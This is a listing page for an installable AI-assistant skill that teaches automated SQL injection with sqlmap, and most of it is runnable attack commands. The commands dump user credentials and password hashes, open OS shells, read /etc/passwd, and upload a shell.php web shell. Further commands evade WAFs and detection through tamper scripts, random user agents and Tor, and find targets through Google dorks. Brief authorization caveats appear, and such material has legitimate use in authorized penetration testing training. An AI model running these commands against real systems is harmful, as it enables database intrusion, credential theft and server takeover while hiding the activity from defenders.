sqlmap database penetration testing

SQLMap Database Penetration Testing

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "sqlmap database penetration testing" with this command: npx skills add sebas-aikon-intelligence/antigravity-awesome-skills/sebas-aikon-intelligence-antigravity-awesome-skills-sqlmap-database-penetration-testing

SQLMap Database Penetration Testing

Purpose

Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.

Inputs / Prerequisites

  • Target URL: Web application URL with injectable parameter (e.g., ?id=1 )

  • SQLMap Installation: Pre-installed on Kali Linux or downloaded from GitHub

  • Verified Injection Point: URL parameter confirmed or suspected to be SQL injectable

  • Request File (Optional): Burp Suite captured HTTP request for POST-based injection

  • Authorization: Written permission for penetration testing activities

Outputs / Deliverables

  • Database Enumeration: List of all databases on the target server

  • Table Structure: Complete table names within target database

  • Column Mapping: Column names and data types for each table

  • Extracted Data: Dumped records including usernames, passwords, and sensitive data

  • Hash Values: Password hashes for offline cracking

  • Vulnerability Report: Confirmation of SQL injection type and severity

Core Workflow

  1. Identify SQL Injection Vulnerability

Manual Verification

Add single quote to break query

http://target.com/page.php?id=1'

If error message appears, likely SQL injectable

Error example: "You have an error in your SQL syntax"

Initial SQLMap Scan

Basic vulnerability detection

sqlmap -u "http://target.com/page.php?id=1" --batch

With verbosity for detailed output

sqlmap -u "http://target.com/page.php?id=1" --batch -v 3

  1. Enumerate Databases

List All Databases

sqlmap -u "http://target.com/page.php?id=1" --dbs --batch

Key Options:

  • -u : Target URL with injectable parameter

  • --dbs : Enumerate database names

  • --batch : Use default answers (non-interactive mode)

  1. Enumerate Tables

List Tables in Specific Database

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch

Key Options:

  • -D : Specify target database name

  • --tables : Enumerate table names

  1. Enumerate Columns

List Columns in Specific Table

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch

Key Options:

  • -T : Specify target table name

  • --columns : Enumerate column names

  1. Extract Data

Dump Specific Table Data

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch

Dump Specific Columns

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch

Dump Entire Database

sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch

Key Options:

  • --dump : Extract all data from specified table

  • --dump-all : Extract all data from all tables

  • -C : Specify column names to extract

  1. Advanced Target Options

Target from HTTP Request File

Save Burp Suite request to file, then:

sqlmap -r /path/to/request.txt --dbs --batch

Target from Log File

Feed log file with multiple requests

sqlmap -l /path/to/logfile --dbs --batch

Target Multiple URLs (Bulk File)

Create file with URLs, one per line:

http://target1.com/page.php?id=1

http://target2.com/page.php?id=2

sqlmap -m /path/to/bulkfile.txt --dbs --batch

Target via Google Dorks (Use with Caution)

Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)

sqlmap -g "inurl:?id= site:yourdomain.com" --batch

Quick Reference Commands

Database Enumeration Progression

Stage Command

List Databases sqlmap -u "URL" --dbs --batch

List Tables sqlmap -u "URL" -D dbname --tables --batch

List Columns sqlmap -u "URL" -D dbname -T tablename --columns --batch

Dump Data sqlmap -u "URL" -D dbname -T tablename --dump --batch

Dump All sqlmap -u "URL" -D dbname --dump-all --batch

Supported Database Management Systems

DBMS Support Level

MySQL Full Support

PostgreSQL Full Support

Microsoft SQL Server Full Support

Oracle Full Support

Microsoft Access Full Support

IBM DB2 Full Support

SQLite Full Support

Firebird Full Support

Sybase Full Support

SAP MaxDB Full Support

HSQLDB Full Support

Informix Full Support

SQL Injection Techniques

Technique Description Flag

Boolean-based blind Infers data from true/false responses --technique=B

Time-based blind Uses time delays to infer data --technique=T

Error-based Extracts data from error messages --technique=E

UNION query-based Uses UNION to append results --technique=U

Stacked queries Executes multiple statements --technique=S

Out-of-band Uses DNS or HTTP for exfiltration --technique=Q

Essential Options

Option Description

-u

Target URL

-r

Load HTTP request from file

-l

Parse targets from Burp/WebScarab log

-m

Bulk file with multiple targets

-g

Google dork (use responsibly)

--dbs

Enumerate databases

--tables

Enumerate tables

--columns

Enumerate columns

--dump

Dump table data

--dump-all

Dump all database data

-D

Specify database

-T

Specify table

-C

Specify columns

--batch

Non-interactive mode

--random-agent

Use random User-Agent

--level

Level of tests (1-5)

--risk

Risk of tests (1-3)

Constraints and Limitations

Operational Boundaries

  • Requires valid injectable parameter in target URL

  • Network connectivity to target database server required

  • Large database dumps may take significant time

  • Some WAF/IPS systems may block SQLMap traffic

  • Time-based attacks significantly slower than error-based

Performance Considerations

  • Use --threads to speed up enumeration (default: 1)

  • Limit dumps with --start and --stop for large tables

  • Use --technique to specify faster injection method if known

Legal Requirements

  • Only test systems with explicit written authorization

  • Google dork attacks against unknown sites are illegal

  • Document all testing activities and findings

  • Respect scope limitations defined in engagement rules

Detection Risk

  • SQLMap generates significant log entries

  • Use --random-agent to vary User-Agent header

  • Consider --delay to avoid triggering rate limits

  • Proxy through Tor with --tor for anonymity (authorized tests only)

Examples

Example 1: Complete Database Enumeration

Step 1: Discover databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

Result: acuart database found

Step 2: List tables

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

Result: users, products, carts, etc.

Step 3: List columns

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

Result: username, password, email columns

Step 4: Dump user credentials

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

Example 2: POST Request Injection

Save Burp request to file (login.txt):

POST /login.php HTTP/1.1

Host: target.com

Content-Type: application/x-www-form-urlencoded

username=admin&password=test

Run SQLMap with request file

sqlmap -r /root/Desktop/login.txt -p username --dbs --batch

Example 3: Bulk Target Scanning

Create bulkfile.txt:

echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt

Scan all targets

sqlmap -m bulkfile.txt --dbs --batch

Example 4: Aggressive Testing

High level and risk for thorough testing

sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3

Specify all techniques

sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ

Example 5: Extract Specific Credentials

Target specific columns

sqlmap -u "http://target.com/page.php?id=1"
-D webapp
-T admin_users
-C admin_name,admin_pass,admin_email
--dump --batch

Automatically crack password hashes

sqlmap -u "http://target.com/page.php?id=1"
-D webapp
-T users
--dump --batch
--passwords

Example 6: OS Shell Access (Advanced)

Get interactive OS shell (requires DBA privileges)

sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch

Execute specific OS command

sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch

File read from server

sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch

File upload to server

sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch

Troubleshooting

Issue: "Parameter does not seem injectable"

Cause: SQLMap cannot find injection point Solution:

Increase testing level and risk

sqlmap -u "URL" --dbs --batch --level=5 --risk=3

Specify parameter explicitly

sqlmap -u "URL" -p "id" --dbs --batch

Try different injection techniques

sqlmap -u "URL" --dbs --batch --technique=BT

Add prefix/suffix for filter bypass

sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"

Issue: Target Behind WAF/Firewall

Cause: Web Application Firewall blocking requests Solution:

Use tamper scripts

sqlmap -u "URL" --dbs --batch --tamper=space2comment

List available tamper scripts

sqlmap --list-tampers

Common tamper combinations

sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase

Add delay between requests

sqlmap -u "URL" --dbs --batch --delay=2

Use random User-Agent

sqlmap -u "URL" --dbs --batch --random-agent

Issue: Connection Timeout

Cause: Network issues or slow target Solution:

Increase timeout

sqlmap -u "URL" --dbs --batch --timeout=60

Reduce threads

sqlmap -u "URL" --dbs --batch --threads=1

Add retries

sqlmap -u "URL" --dbs --batch --retries=5

Issue: Time-Based Attacks Too Slow

Cause: Default time delay too conservative Solution:

Reduce time delay (risky, may cause false negatives)

sqlmap -u "URL" --dbs --batch --time-sec=3

Use boolean-based instead if possible

sqlmap -u "URL" --dbs --batch --technique=B

Issue: Cannot Dump Large Tables

Cause: Table has too many records Solution:

Limit number of records

sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100

Dump specific columns only

sqlmap -u "URL" -D db -T table -C username,password --dump --batch

Exclude specific columns

sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs

Issue: Session Drops During Long Scan

Cause: Session timeout or connection reset Solution:

Save and resume session

sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session

Resume from saved session

sqlmap -u "URL" --dbs --batch --resume

Use persistent HTTP connection

sqlmap -u "URL" --dbs --batch --keep-alive

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Related Skills

Related by shared tags or category signals.

General

sqlmap database penetration testing

No summary provided by upstream source.

Repository SourceNeeds Review
General

api-documentation-generator

No summary provided by upstream source.

Repository SourceNeeds Review